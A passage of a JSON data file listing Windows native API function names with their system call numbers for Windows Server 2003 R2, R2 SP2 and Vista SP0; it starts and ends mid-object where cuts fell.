"NtOpenMutant": "188", "NtOpenObjectAuditAlarm": "189", "NtOpenProcessToken": "190", "NtOpenSemaphore": "191", "NtOpenSymbolicLinkObject": "192", "NtOpenThread": "193", "NtOpenTimer": "194", "NtPlugPlayControl": "195", "NtPrivilegeCheck": "196", "NtPrivilegeObjectAuditAlarm": "197", "NtPrivilegedServiceAuditAlarm": "198", "NtPulseEvent": "199", "NtQueryBootEntryOrder": "200", "NtQueryBootOptions": "201", "NtQueryDebugFilterState": "202", "NtQueryDirectoryObject": "203", "NtQueryDriverEntryOrder": "204", "NtQueryEaFile": "205", "NtQueryFullAttributesFile": "206", "NtQueryInformationAtom": "207", "NtQueryInformationJobObject": "208", "NtQueryInformationPort": "209", "NtQueryInstallUILanguage": "210", "NtQueryIntervalProfile": "211", "NtQueryIoCompletion": "212", "NtQueryMultipleValueKey": "213", "NtQueryMutant": "214", "NtQueryOpenSubKeys": "215", "NtQueryOpenSubKeysEx": "216", "NtQueryPortInformationProcess": "217", "NtQueryQuotaInformationFile": "218", "NtQuerySecurityObject": "219", "NtQuerySemaphore": "220", "NtQuerySymbolicLinkObject": "221", "NtQuerySystemEnvironmentValue": "222", "NtQuerySystemEnvironmentValueEx": "223", "NtQueryTimerResolution": "224", "NtRaiseException": "225", "NtRaiseHardError": "226", "NtRegisterThreadTerminatePort": "227", "NtReleaseKeyedEvent": "228", "NtRemoveProcessDebug": "229", "NtRenameKey": "230", "NtReplaceKey": "231", "NtReplyWaitReplyPort": "232", "NtRequestDeviceWakeup": "233", "NtRequestPort": "234", "NtRequestWakeupLatency": "235", "NtResetEvent": "236", "NtResetWriteWatch": "237", "NtRestoreKey": "238", "NtResumeProcess": "239", "NtSaveKey": "240", "NtSaveKeyEx": "241", "NtSaveMergedKeys": "242", "NtSecureConnectPort": "243", "NtSetBootEntryOrder": "244", "NtSetBootOptions": "245", "NtSetContextThread": "246", "NtSetDebugFilterState": "247", "NtSetDefaultHardErrorPort": "248", "NtSetDefaultLocale": "249", "NtSetDefaultUILanguage": "250", "NtSetDriverEntryOrder": "251", "NtSetEaFile": "252", "NtSetHighEventPair": "253", "NtSetHighWaitLowEventPair": "254", "NtSetInformationDebugObject": "255", "NtSetInformationJobObject": "256", "NtSetInformationKey": "257", "NtSetInformationToken": "258", "NtSetIntervalProfile": "259", "NtSetIoCompletion": "260", "NtSetLdtEntries": "261", "NtSetLowEventPair": "262", "NtSetLowWaitHighEventPair": "263", "NtSetQuotaInformationFile": "264", "NtSetSecurityObject": "265", "NtSetSystemEnvironmentValue": "266", "NtSetSystemEnvironmentValueEx": "267", "NtSetSystemInformation": "268", "NtSetSystemPowerState": "269", "NtSetSystemTime": "270", "NtSetThreadExecutionState": "271", "NtSetTimerResolution": "272", "NtSetUuidSeed": "273", "NtSetVolumeInformationFile": "274", "NtShutdownSystem": "275", "NtSignalAndWaitForSingleObject": "276", "NtStartProfile": "277", "NtStopProfile": "278", "NtSuspendProcess": "279", "NtSuspendThread": "280", "NtSystemDebugControl": "281", "NtTerminateJobObject": "282", "NtTestAlert": "283", "NtTranslateFilePath": "284", "NtUnloadDriver": "285", "NtUnloadKey": "286", "NtUnloadKey2": "287", "NtUnloadKeyEx": "288", "NtUnlockFile": "289", "NtUnlockVirtualMemory": "290", "NtVdmControl": "291", "NtWaitForDebugEvent": "292", "NtWaitForKeyedEvent": "293", "NtWaitHighEventPair": "294", "NtWaitLowEventPair": "295"}, "R2": {"NtMapUserPhysicalPagesScatter": "0", "NtWaitForSingleObject": "1", "NtCallbackReturn": "2", "NtReadFile": "3", "NtDeviceIoControlFile": "4", "NtWriteFile": "5", "NtRemoveIoCompletion": "6", "NtReleaseSemaphore": "7", "NtReplyWaitReceivePort": "8", "NtReplyPort": "9", "NtSetInformationThread": "10", "NtSetEvent": "11", "NtClose": "12", "NtQueryObject": "13", "NtQueryInformationFile": "14", "NtOpenKey": "15", "NtEnumerateValueKey": "16", "NtFindAtom": "17", "NtQueryDefaultLocale": "18", "NtQueryKey": "19", "NtQueryValueKey": "20", "NtAllocateVirtualMemory": "21", "NtQueryInformationProcess": "22", "NtWaitForMultipleObjects32": "23", "NtWriteFileGather": "24", "NtSetInformationProcess": "25", "NtCreateKey": "26", "NtFreeVirtualMemory": "27", "NtImpersonateClientOfPort": "28", "NtReleaseMutant": "29", "NtQueryInformationToken": "30", "NtRequestWaitReplyPort": "31", "NtQueryVirtualMemory": "32", "NtOpenThreadToken": "33", "NtQueryInformationThread": "34", "NtOpenProcess": "35", "NtSetInformationFile": "36", "NtMapViewOfSection": "37", "NtAccessCheckAndAuditAlarm": "38", "NtUnmapViewOfSection": "39", "NtReplyWaitReceivePortEx": "40", "NtTerminateProcess": "41", "NtSetEventBoostPriority": "42", "NtReadFileScatter": "43", "NtOpenThreadTokenEx": "44", "NtOpenProcessTokenEx": "45", "NtQueryPerformanceCounter": "46", "NtEnumerateKey": "47", "NtOpenFile": "48", "NtDelayExecution": "49", "NtQueryDirectoryFile": "50", "NtQuerySystemInformation": "51", "NtOpenSection": "52", "NtQueryTimer": "53", "NtFsControlFile": "54", "NtWriteVirtualMemory": "55", "NtCloseObjectAuditAlarm": "56", "NtDuplicateObject": "57", "NtQueryAttributesFile": "58", "NtClearEvent": "59", "NtReadVirtualMemory": "60", "NtOpenEvent": "61", "NtAdjustPrivilegesToken": "62", "NtDuplicateToken": "63", "NtContinue": "64", "NtQueryDefaultUILanguage": "65", "NtQueueApcThread": "66", "NtYieldExecution": "67", "NtAddAtom": "68", "NtCreateEvent": "69", "NtQueryVolumeInformationFile": "70", "NtCreateSection": "71", "NtFlushBuffersFile": "72", "NtApphelpCacheControl": "73", "NtCreateProcessEx": "74", "NtCreateThread": "75", "NtIsProcessInJob": "76", "NtProtectVirtualMemory": "77", "NtQuerySection": "78", "NtResumeThread": "79", "NtTerminateThread": "80", "NtReadRequestData": "81", "NtCreateFile": "82", "NtQueryEvent": "83", "NtWriteRequestData": "84", "NtOpenDirectoryObject": "85", "NtAccessCheckByTypeAndAuditAlarm": "86", "NtQuerySystemTime": "87", "NtWaitForMultipleObjects": "88", "NtSetInformationObject": "89", "NtCancelIoFile": "90", "NtTraceEvent": "91", "NtPowerInformation": "92", "NtSetValueKey": "93", "NtCancelTimer": "94", "NtSetTimer": "95", "NtAcceptConnectPort": "96", "NtAccessCheck": "97", "NtAccessCheckByType": "98", "NtAccessCheckByTypeResultList": "99", "NtAccessCheckByTypeResultListAndAuditAlarm": "100", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "101", "NtAddBootEntry": "102", "NtAddDriverEntry": "103", "NtAdjustGroupsToken": "104", "NtAlertResumeThread": "105", "NtAlertThread": "106", "NtAllocateLocallyUniqueId": "107", "NtAllocateUserPhysicalPages": "108", "NtAllocateUuids": "109", "NtAreMappedFilesTheSame": "110", "NtAssignProcessToJobObject": "111", "NtCancelDeviceWakeupRequest": "112", "NtCompactKeys": "113", "NtCompareTokens": "114", "NtCompleteConnectPort": "115", "NtCompressKey": "116", "NtConnectPort": "117", "NtCreateDebugObject": "118", "NtCreateDirectoryObject": "119", "NtCreateEventPair": "120", "NtCreateIoCompletion": "121", "NtCreateJobObject": "122", "NtCreateJobSet": "123", "NtCreateKeyedEvent": "124", "NtCreateMailslotFile": "125", "NtCreateMutant": "126", "NtCreateNamedPipeFile": "127", "NtCreatePagingFile": "128", "NtCreatePort": "129", "NtCreateProcess": "130", "NtCreateProfile": "131", "NtCreateSemaphore": "132", "NtCreateSymbolicLinkObject": "133", "NtCreateTimer": "134", "NtCreateToken": "135", "NtCreateWaitablePort": "136", "NtDebugActiveProcess": "137", "NtDebugContinue": "138", "NtDeleteAtom": "139", "NtDeleteBootEntry": "140", "NtDeleteDriverEntry": "141", "NtDeleteFile": "142", "NtDeleteKey": "143", "NtDeleteObjectAuditAlarm": "144", "NtDeleteValueKey": "145", "NtDisplayString": "146", "NtEnumerateBootEntries": "147", "NtEnumerateDriverEntries": "148", "NtEnumerateSystemEnvironmentValuesEx": "149", "NtExtendSection": "150", "NtFilterToken": "151", "NtFlushInstructionCache": "152", "NtFlushKey": "153", "NtFlushVirtualMemory": "154", "NtFlushWriteBuffer": "155", "NtFreeUserPhysicalPages": "156", "NtGetContextThread": "157", "NtGetCurrentProcessorNumber": "158", "NtGetDevicePowerState": "159", "NtGetPlugPlayEvent": "160", "NtGetWriteWatch": "161", "NtImpersonateAnonymousToken": "162", "NtImpersonateThread": "163", "NtInitializeRegistry": "164", "NtInitiatePowerAction": "165", "NtIsSystemResumeAutomatic": "166", "NtListenPort": "167", "NtLoadDriver": "168", "NtLoadKey": "169", "NtLoadKey2": "170", "NtLoadKeyEx": "171", "NtLockFile": "172", "NtLockProductActivationKeys": "173", "NtLockRegistryKey": "174", "NtLockVirtualMemory": "175", "NtMakePermanentObject": "176", "NtMakeTemporaryObject": "177", "NtMapUserPhysicalPages": "178", "NtModifyBootEntry": "179", "NtModifyDriverEntry": "180", "NtNotifyChangeDirectoryFile": "181", "NtNotifyChangeKey": "182", "NtNotifyChangeMultipleKeys": "183", "NtOpenEventPair": "184", "NtOpenIoCompletion": "185", "NtOpenJobObject": "186", "NtOpenKeyedEvent": "187", "NtOpenMutant": "188", "NtOpenObjectAuditAlarm": "189", "NtOpenProcessToken": "190", "NtOpenSemaphore": "191", "NtOpenSymbolicLinkObject": "192", "NtOpenThread": "193", "NtOpenTimer": "194", "NtPlugPlayControl": "195", "NtPrivilegeCheck": "196", "NtPrivilegeObjectAuditAlarm": "197", "NtPrivilegedServiceAuditAlarm": "198", "NtPulseEvent": "199", "NtQueryBootEntryOrder": "200", "NtQueryBootOptions": "201", "NtQueryDebugFilterState": "202", "NtQueryDirectoryObject": "203", "NtQueryDriverEntryOrder": "204", "NtQueryEaFile": "205", "NtQueryFullAttributesFile": "206", "NtQueryInformationAtom": "207", "NtQueryInformationJobObject": "208", "NtQueryInformationPort": "209", "NtQueryInstallUILanguage": "210", "NtQueryIntervalProfile": "211", "NtQueryIoCompletion": "212", "NtQueryMultipleValueKey": "213", "NtQueryMutant": "214", "NtQueryOpenSubKeys": "215", "NtQueryOpenSubKeysEx": "216", "NtQueryPortInformationProcess": "217", "NtQueryQuotaInformationFile": "218", "NtQuerySecurityObject": "219", "NtQuerySemaphore": "220", "NtQuerySymbolicLinkObject": "221", "NtQuerySystemEnvironmentValue": "222", "NtQuerySystemEnvironmentValueEx": "223", "NtQueryTimerResolution": "224", "NtRaiseException": "225", "NtRaiseHardError": "226", "NtRegisterThreadTerminatePort": "227", "NtReleaseKeyedEvent": "228", "NtRemoveProcessDebug": "229", "NtRenameKey": "230", "NtReplaceKey": "231", "NtReplyWaitReplyPort": "232", "NtRequestDeviceWakeup": "233", "NtRequestPort": "234", "NtRequestWakeupLatency": "235", "NtResetEvent": "236", "NtResetWriteWatch": "237", "NtRestoreKey": "238", "NtResumeProcess": "239", "NtSaveKey": "240", "NtSaveKeyEx": "241", "NtSaveMergedKeys": "242", "NtSecureConnectPort": "243", "NtSetBootEntryOrder": "244", "NtSetBootOptions": "245", "NtSetContextThread": "246", "NtSetDebugFilterState": "247", "NtSetDefaultHardErrorPort": "248", "NtSetDefaultLocale": "249", "NtSetDefaultUILanguage": "250", "NtSetDriverEntryOrder": "251", "NtSetEaFile": "252", "NtSetHighEventPair": "253", "NtSetHighWaitLowEventPair": "254", "NtSetInformationDebugObject": "255", "NtSetInformationJobObject": "256", "NtSetInformationKey": "257", "NtSetInformationToken": "258", "NtSetIntervalProfile": "259", "NtSetIoCompletion": "260", "NtSetLdtEntries": "261", "NtSetLowEventPair": "262", "NtSetLowWaitHighEventPair": "263", "NtSetQuotaInformationFile": "264", "NtSetSecurityObject": "265", "NtSetSystemEnvironmentValue": "266", "NtSetSystemEnvironmentValueEx": "267", "NtSetSystemInformation": "268", "NtSetSystemPowerState": "269", "NtSetSystemTime": "270", "NtSetThreadExecutionState": "271", "NtSetTimerResolution": "272", "NtSetUuidSeed": "273", "NtSetVolumeInformationFile": "274", "NtShutdownSystem": "275", "NtSignalAndWaitForSingleObject": "276", "NtStartProfile": "277", "NtStopProfile": "278", "NtSuspendProcess": "279", "NtSuspendThread": "280", "NtSystemDebugControl": "281", "NtTerminateJobObject": "282", "NtTestAlert": "283", "NtTranslateFilePath": "284", "NtUnloadDriver": "285", "NtUnloadKey": "286", "NtUnloadKey2": "287", "NtUnloadKeyEx": "288", "NtUnlockFile": "289", "NtUnlockVirtualMemory": "290", "NtVdmControl": "291", "NtWaitForDebugEvent": "292", "NtWaitForKeyedEvent": "293", "NtWaitHighEventPair": "294", "NtWaitLowEventPair": "295"}, "R2 SP2": {"NtMapUserPhysicalPagesScatter": "0", "NtWaitForSingleObject": "1", "NtCallbackReturn": "2", "NtReadFile": "3", "NtDeviceIoControlFile": "4", "NtWriteFile": "5", "NtRemoveIoCompletion": "6", "NtReleaseSemaphore": "7", "NtReplyWaitReceivePort": "8", "NtReplyPort": "9", "NtSetInformationThread": "10", "NtSetEvent": "11", "NtClose": "12", "NtQueryObject": "13", "NtQueryInformationFile": "14", "NtOpenKey": "15", "NtEnumerateValueKey": "16", "NtFindAtom": "17", "NtQueryDefaultLocale": "18", "NtQueryKey": "19", "NtQueryValueKey": "20", "NtAllocateVirtualMemory": "21", "NtQueryInformationProcess": "22", "NtWaitForMultipleObjects32": "23", "NtWriteFileGather": "24", "NtSetInformationProcess": "25", "NtCreateKey": "26", "NtFreeVirtualMemory": "27", "NtImpersonateClientOfPort": "28", "NtReleaseMutant": "29", "NtQueryInformationToken": "30", "NtRequestWaitReplyPort": "31", "NtQueryVirtualMemory": "32", "NtOpenThreadToken": "33", "NtQueryInformationThread": "34", "NtOpenProcess": "35", "NtSetInformationFile": "36", "NtMapViewOfSection": "37", "NtAccessCheckAndAuditAlarm": "38", "NtUnmapViewOfSection": "39", "NtReplyWaitReceivePortEx": "40", "NtTerminateProcess": "41", "NtSetEventBoostPriority": "42", "NtReadFileScatter": "43", "NtOpenThreadTokenEx": "44", "NtOpenProcessTokenEx": "45", "NtQueryPerformanceCounter": "46", "NtEnumerateKey": "47", "NtOpenFile": "48", "NtDelayExecution": "49", "NtQueryDirectoryFile": "50", "NtQuerySystemInformation": "51", "NtOpenSection": "52", "NtQueryTimer": "53", "NtFsControlFile": "54", "NtWriteVirtualMemory": "55", "NtCloseObjectAuditAlarm": "56", "NtDuplicateObject": "57", "NtQueryAttributesFile": "58", "NtClearEvent": "59", "NtReadVirtualMemory": "60", "NtOpenEvent": "61", "NtAdjustPrivilegesToken": "62", "NtDuplicateToken": "63", "NtContinue": "64", "NtQueryDefaultUILanguage": "65", "NtQueueApcThread": "66", "NtYieldExecution": "67", "NtAddAtom": "68", "NtCreateEvent": "69", "NtQueryVolumeInformationFile": "70", "NtCreateSection": "71", "NtFlushBuffersFile": "72", "NtApphelpCacheControl": "73", "NtCreateProcessEx": "74", "NtCreateThread": "75", "NtIsProcessInJob": "76", "NtProtectVirtualMemory": "77", "NtQuerySection": "78", "NtResumeThread": "79", "NtTerminateThread": "80", "NtReadRequestData": "81", "NtCreateFile": "82", "NtQueryEvent": "83", "NtWriteRequestData": "84", "NtOpenDirectoryObject": "85", "NtAccessCheckByTypeAndAuditAlarm": "86", "NtQuerySystemTime": "87", "NtWaitForMultipleObjects": "88", "NtSetInformationObject": "89", "NtCancelIoFile": "90", "NtTraceEvent": "91", "NtPowerInformation": "92", "NtSetValueKey": "93", "NtCancelTimer": "94", "NtSetTimer": "95", "NtAcceptConnectPort": "96", "NtAccessCheck": "97", "NtAccessCheckByType": "98", "NtAccessCheckByTypeResultList": "99", "NtAccessCheckByTypeResultListAndAuditAlarm": "100", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "101", "NtAddBootEntry": "102", "NtAddDriverEntry": "103", "NtAdjustGroupsToken": "104", "NtAlertResumeThread": "105", "NtAlertThread": "106", "NtAllocateLocallyUniqueId": "107", "NtAllocateUserPhysicalPages": "108", "NtAllocateUuids": "109", "NtAreMappedFilesTheSame": "110", "NtAssignProcessToJobObject": "111", "NtCancelDeviceWakeupRequest": "112", "NtCompactKeys": "113", "NtCompareTokens": "114", "NtCompleteConnectPort": "115", "NtCompressKey": "116", "NtConnectPort": "117", "NtCreateDebugObject": "118", "NtCreateDirectoryObject": "119", "NtCreateEventPair": "120", "NtCreateIoCompletion": "121", "NtCreateJobObject": "122", "NtCreateJobSet": "123", "NtCreateKeyedEvent": "124", "NtCreateMailslotFile": "125", "NtCreateMutant": "126", "NtCreateNamedPipeFile": "127", "NtCreatePagingFile": "128", "NtCreatePort": "129", "NtCreateProcess": "130", "NtCreateProfile": "131", "NtCreateSemaphore": "132", "NtCreateSymbolicLinkObject": "133", "NtCreateTimer": "134", "NtCreateToken": "135", "NtCreateWaitablePort": "136", "NtDebugActiveProcess": "137", "NtDebugContinue": "138", "NtDeleteAtom": "139", "NtDeleteBootEntry": "140", "NtDeleteDriverEntry": "141", "NtDeleteFile": "142", "NtDeleteKey": "143", "NtDeleteObjectAuditAlarm": "144", "NtDeleteValueKey": "145", "NtDisplayString": "146", "NtEnumerateBootEntries": "147", "NtEnumerateDriverEntries": "148", "NtEnumerateSystemEnvironmentValuesEx": "149", "NtExtendSection": "150", "NtFilterToken": "151", "NtFlushInstructionCache": "152", "NtFlushKey": "153", "NtFlushVirtualMemory": "154", "NtFlushWriteBuffer": "155", "NtFreeUserPhysicalPages": "156", "NtGetContextThread": "157", "NtGetCurrentProcessorNumber": "158", "NtGetDevicePowerState": "159", "NtGetPlugPlayEvent": "160", "NtGetWriteWatch": "161", "NtImpersonateAnonymousToken": "162", "NtImpersonateThread": "163", "NtInitializeRegistry": "164", "NtInitiatePowerAction": "165", "NtIsSystemResumeAutomatic": "166", "NtListenPort": "167", "NtLoadDriver": "168", "NtLoadKey": "169", "NtLoadKey2": "170", "NtLoadKeyEx": "171", "NtLockFile": "172", "NtLockProductActivationKeys": "173", "NtLockRegistryKey": "174", "NtLockVirtualMemory": "175", "NtMakePermanentObject": "176", "NtMakeTemporaryObject": "177", "NtMapUserPhysicalPages": "178", "NtModifyBootEntry": "179", "NtModifyDriverEntry": "180", "NtNotifyChangeDirectoryFile": "181", "NtNotifyChangeKey": "182", "NtNotifyChangeMultipleKeys": "183", "NtOpenEventPair": "184", "NtOpenIoCompletion": "185", "NtOpenJobObject": "186", "NtOpenKeyedEvent": "187", "NtOpenMutant": "188", "NtOpenObjectAuditAlarm": "189", "NtOpenProcessToken": "190", "NtOpenSemaphore": "191", "NtOpenSymbolicLinkObject": "192", "NtOpenThread": "193", "NtOpenTimer": "194", "NtPlugPlayControl": "195", "NtPrivilegeCheck": "196", "NtPrivilegeObjectAuditAlarm": "197", "NtPrivilegedServiceAuditAlarm": "198", "NtPulseEvent": "199", "NtQueryBootEntryOrder": "200", "NtQueryBootOptions": "201", "NtQueryDebugFilterState": "202", "NtQueryDirectoryObject": "203", "NtQueryDriverEntryOrder": "204", "NtQueryEaFile": "205", "NtQueryFullAttributesFile": "206", "NtQueryInformationAtom": "207", "NtQueryInformationJobObject": "208", "NtQueryInformationPort": "209", "NtQueryInstallUILanguage": "210", "NtQueryIntervalProfile": "211", "NtQueryIoCompletion": "212", "NtQueryMultipleValueKey": "213", "NtQueryMutant": "214", "NtQueryOpenSubKeys": "215", "NtQueryOpenSubKeysEx": "216", "NtQueryPortInformationProcess": "217", "NtQueryQuotaInformationFile": "218", "NtQuerySecurityObject": "219", "NtQuerySemaphore": "220", "NtQuerySymbolicLinkObject": "221", "NtQuerySystemEnvironmentValue": "222", "NtQuerySystemEnvironmentValueEx": "223", "NtQueryTimerResolution": "224", "NtRaiseException": "225", "NtRaiseHardError": "226", "NtRegisterThreadTerminatePort": "227", "NtReleaseKeyedEvent": "228", "NtRemoveProcessDebug": "229", "NtRenameKey": "230", "NtReplaceKey": "231", "NtReplyWaitReplyPort": "232", "NtRequestDeviceWakeup": "233", "NtRequestPort": "234", "NtRequestWakeupLatency": "235", "NtResetEvent": "236", "NtResetWriteWatch": "237", "NtRestoreKey": "238", "NtResumeProcess": "239", "NtSaveKey": "240", "NtSaveKeyEx": "241", "NtSaveMergedKeys": "242", "NtSecureConnectPort": "243", "NtSetBootEntryOrder": "244", "NtSetBootOptions": "245", "NtSetContextThread": "246", "NtSetDebugFilterState": "247", "NtSetDefaultHardErrorPort": "248", "NtSetDefaultLocale": "249", "NtSetDefaultUILanguage": "250", "NtSetDriverEntryOrder": "251", "NtSetEaFile": "252", "NtSetHighEventPair": "253", "NtSetHighWaitLowEventPair": "254", "NtSetInformationDebugObject": "255", "NtSetInformationJobObject": "256", "NtSetInformationKey": "257", "NtSetInformationToken": "258", "NtSetIntervalProfile": "259", "NtSetIoCompletion": "260", "NtSetLdtEntries": "261", "NtSetLowEventPair": "262", "NtSetLowWaitHighEventPair": "263", "NtSetQuotaInformationFile": "264", "NtSetSecurityObject": "265", "NtSetSystemEnvironmentValue": "266", "NtSetSystemEnvironmentValueEx": "267", "NtSetSystemInformation": "268", "NtSetSystemPowerState": "269", "NtSetSystemTime": "270", "NtSetThreadExecutionState": "271", "NtSetTimerResolution": "272", "NtSetUuidSeed": "273", "NtSetVolumeInformationFile": "274", "NtShutdownSystem": "275", "NtSignalAndWaitForSingleObject": "276", "NtStartProfile": "277", "NtStopProfile": "278", "NtSuspendProcess": "279", "NtSuspendThread": "280", "NtSystemDebugControl": "281", "NtTerminateJobObject": "282", "NtTestAlert": "283", "NtTranslateFilePath": "284", "NtUnloadDriver": "285", "NtUnloadKey": "286", "NtUnloadKey2": "287", "NtUnloadKeyEx": "288", "NtUnlockFile": "289", "NtUnlockVirtualMemory": "290", "NtVdmControl": "291", "NtWaitForDebugEvent": "292", "NtWaitForKeyedEvent": "293", "NtWaitHighEventPair": "294", "NtWaitLowEventPair": "295"}}, "Windows Vista": {"SP0": {"NtMapUserPhysicalPagesScatter": "0", "NtWaitForSingleObject": "1", "NtCallbackReturn": "2", "NtReadFile": "3", "NtDeviceIoControlFile": "4", "NtWriteFile": "5", "NtRemoveIoCompletion": "6", "NtReleaseSemaphore": "7", "NtReplyWaitReceivePort": "8", "NtReplyPort": "9", "NtSetInformationThread": "10", "NtSetEvent": "11", "NtClose": "12", "NtQueryObject": "13", "NtQueryInformationFile": "14", "NtOpenKey": "15", "NtEnumerateValueKey": "16", "NtFindAtom": "17", "NtQueryDefaultLocale": "18", "NtQueryKey": "19", "NtQueryValueKey": "20", "NtAllocateVirtualMemory": "21", "NtQueryInformationProcess": "22", "NtWaitForMultipleObjects32": "23", "NtWriteFileGather": "24", "NtSetInformationProcess": "25", "NtCreateKey": "26", "NtFreeVirtualMemory": "27", "NtImpersonateClientOfPort": "28", "NtReleaseMutant": "29", "NtQueryInformationToken": "30", "NtRequestWaitReplyPort": "31", "NtQueryVirtualMemory": "32", "NtOpenThreadToken": "33", "NtQueryInformationThread": "34", "NtOpenProcess": "35", "NtSetInformationFile": "36", "NtMapViewOfSection": "37", "NtAccessCheckAndAuditAlarm": "38", "NtUnmapViewOfSection": "39", "NtReplyWaitReceivePortEx": "40", "NtTerminateProcess": "41", "NtSetEventBoostPriority": "42", "NtReadFileScatter": "43", "NtOpenThreadTokenEx": "44", "NtOpenProcessTokenEx": "45", "NtQueryPerformanceCounter": "46", "NtEnumerateKey": "47", "NtOpenFile": "48", "NtDelayExecution": "49", "NtQueryDirectoryFile": "50", "NtQuerySystemInformation": "51", "NtOpenSection": "52", "NtQueryTimer": "53", "NtFsControlFile": "54", "NtWriteVirtualMemory": "55", "NtCloseObjectAuditAlarm": "56", "NtDuplicateObject": "57", "NtQueryAttributesFile": "58", "NtClearEvent": "59", "NtReadVirtualMemory": "60", "NtOpenEvent": "61", "NtAdjustPrivilegesToken": "62", "NtDuplicateToken": "63", "NtContinue": "64", "NtQueryDefaultUILanguage": "65", "NtQueueApcThread": "66", "NtYieldExecution": "67", "NtAddAtom": "68", "NtCreateEvent": "69", "NtQueryVolumeInformationFile": "70", "NtCreateSection": "71", "NtFlushBuffersFile": "72", "NtApphelpCacheControl": "73", "NtCreateProcessEx": "74", "NtCreateThread": "75", "NtIsProcessInJob": "76", "NtProtectVirtualMemory": "77", "NtQuerySection": "78", "NtResumeThread": "79", "NtTerminateThread": "80", "NtReadRequestData": "81", "NtCreateFile": "82", "NtQueryEvent": "83", "NtWriteRequestData": "84", "NtOpenDirectoryObject": "85", "NtAccessCheckByTypeAndAuditAlarm": "86", "NtQuerySystemTime": "87", "NtWaitForMultipleObjects": "88", "NtSetInformationObject": "89", "NtCancelIoFile": "90", "NtTraceEvent": "91", "NtPowerInformation": "92", "NtSetValueKey": "93", "NtCancelTimer": "94", "NtSetTimer": "95", "NtAcceptConnectPort": "96", "NtAccessCheck": "97", "NtAccessCheckByType": "98", "NtAccessCheckByTypeResultList": "99", "NtAccessCheckByTypeResultListAndAuditAlarm": "100", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "101", "NtAcquireCMFViewOwnership": "102", "NtAddBootEntry": "103", "NtAddDriverEntry": "104", "NtAdjustGroupsToken": "105", "NtAlertResumeThread": "106", "NtAlertThread": "107", "NtAllocateLocallyUniqueId": "108", "NtAllocateUserPhysicalPages": "109", "NtAllocateUuids": "110", "NtAlpcAcceptConnectPort": "111", "NtAlpcCancelMessage": "112", "NtAlpcConnectPort": "113", "NtAlpcCreatePort": "114", "NtAlpcCreatePortSection": "115", "NtAlpcCreateResourceReserve": "116", "NtAlpcCreateSectionView": "117", "NtAlpcCreateSecurityContext": "118", "NtAlpcDeletePortSection": "119", "NtAlpcDeleteResourceReserve": "120", "NtAlpcDeleteSectionView": "121", "NtAlpcDeleteSecurityContext": "122", "NtAlpcDisconnectPort": "123", "NtAlpcImpersonateClientOfPort": "124", "NtAlpcOpenSenderProcess": "125", "NtAlpcOpenSenderThread": "126", "NtAlpcQueryInformation": "127", "NtAlpcQueryInformationMessage": "128", "NtAlpcRevokeSecurityContext": "129", "NtAlpcSendWaitReceivePort": "130", "NtAlpcSetInformation": "131", "NtAreMappedFilesTheSame": "132", "NtAssignProcessToJobObject": "133", "NtCancelDeviceWakeupRequest": "134", "NtCancelIoFileEx": "135", "NtCancelSynchronousIoFile": "136", "NtClearAllSavepointsTransaction": "137", "NtClearSavepointTransaction": "138", "NtCommitComplete": "139", "NtCommitEnlistment": "140", "NtCommitTransaction": "141", "NtCompactKeys": "142", "NtCompareTokens": "143", "NtCompleteConnectPort": "144", "NtCompressKey": "145", "NtConnectPort": "146", "NtCreateDebugObject": "147", "NtCreateDirectoryObject": "148", "NtCreateEnlistment": "149", "NtCreateEventPair": "150", "NtCreateIoCompletion": "151", "NtCreateJobObject": "152", "NtCreateJobSet": "153", "NtCreateKeyTransacted": "154", "NtCreateKeyedEvent": "155", "NtCreateMailslotFile": "156", "NtCreateMutant": "157", "NtCreateNamedPipeFile": "158", "NtCreatePagingFile": "159", "NtCreatePort": "160", "NtCreatePrivateNamespace": "161", "NtCreateProcess": "162", "NtCreateProfile": "163", "NtCreateResourceManager": "164", "NtCreateSemaphore": "165", "NtCreateSymbolicLinkObject": "166", "NtCreateThreadEx": "167", "NtCreateTimer": "168", "NtCreateToken": "169", "NtCreateTransaction": "170", "NtCreateTransactionManager": "171", "NtCreateUserProcess": "172", "NtCreateWaitablePort": "173", "NtCreateWorkerFactory": "174", "NtDebugActiveProcess": "175", "NtDebugContinue": "176", "NtDeleteAtom": "177", "NtDeleteBootEntry": "178", "NtDeleteDriverEntry": "179", "NtDeleteFile": "180", "NtDeleteKey": "181", "NtDeleteObjectAuditAlarm": "182", "NtDeletePrivateNamespace": "183", "NtDeleteValueKey": "184", "NtDisplayString": "185", "NtEnumerateBootEntries": "186", "NtEnumerateDriverEntries": "187", "NtEnumerateSystemEnvironmentValuesEx": "188", "NtEnumerateTransactionObject": "189", "NtExtendSection": "190", "NtFilterToken": "191", "NtFlushInstallUILanguage": "192", "NtFlushInstructionCache": "193", "NtFlushKey": "194", "NtFlushProcessWriteBuffers": "195", "NtFlushVirtualMemory": "196", "NtFlushWriteBuffer": "197", "NtFreeUserPhysicalPages": "198", "NtFreezeRegistry": "199", "NtFreezeTransactions": "200", "NtGetContextThread": "201", "NtGetCurrentProcessorNumber": "202", "NtGetDevicePowerState": "203", "NtGetMUIRegistryInfo": "204", "NtGetNextProcess": "205", "NtGetNextThread": "206", "NtGetNlsSectionPtr": "207", "NtGetNotificationResourceManager": "208", "NtGetPlugPlayEvent": "209", "NtGetWriteWatch": "210", "NtImpersonateAnonymousToken": "211", "NtImpersonateThread": "212", "NtInitializeNlsFiles": "213", "NtInitializeRegistry": "214", "NtInitiatePowerAction": "215", "NtIsSystemResumeAutomatic": "216", "NtIsUILanguageComitted": "217", "NtListTransactions": "218", "NtListenPort": "219", "NtLoadDriver": "220", "NtLoadKey": "221", "NtLoadKey2": "222", "NtLoadKeyEx": "223", "NtLockFile": "224", "NtLockProductActivationKeys": "225", "NtLockRegistryKey": "226", "NtLockVirtualMemory": "227", "NtMakePermanentObject": "228", "NtMakeTemporaryObject": "229", "NtMapCMFModule": "230", "NtMapUserPhysicalPages": "231", "NtMarshallTransaction": "232", "NtModifyBootEntry": "233", "NtModifyDriverEntry": "234", "NtNotifyChangeDirectoryFile": "235", "NtNotifyChangeKey": "236", "NtNotifyChangeMultipleKeys": "237", "NtOpenEnlistment": "238", "NtOpenEventPair": "239", "NtOpenIoCompletion": "240", "NtOpenJobObject": "241", "NtOpenKeyTransacted": "242", "NtOpenKeyedEvent": "243", "NtOpenMutant": "244", "NtOpenObjectAuditAlarm": "245", "NtOpenPrivateNamespace": "246", "NtOpenProcessToken": "247", "NtOpenResourceManager": "248", "NtOpenSemaphore": "249", "NtOpenSession": 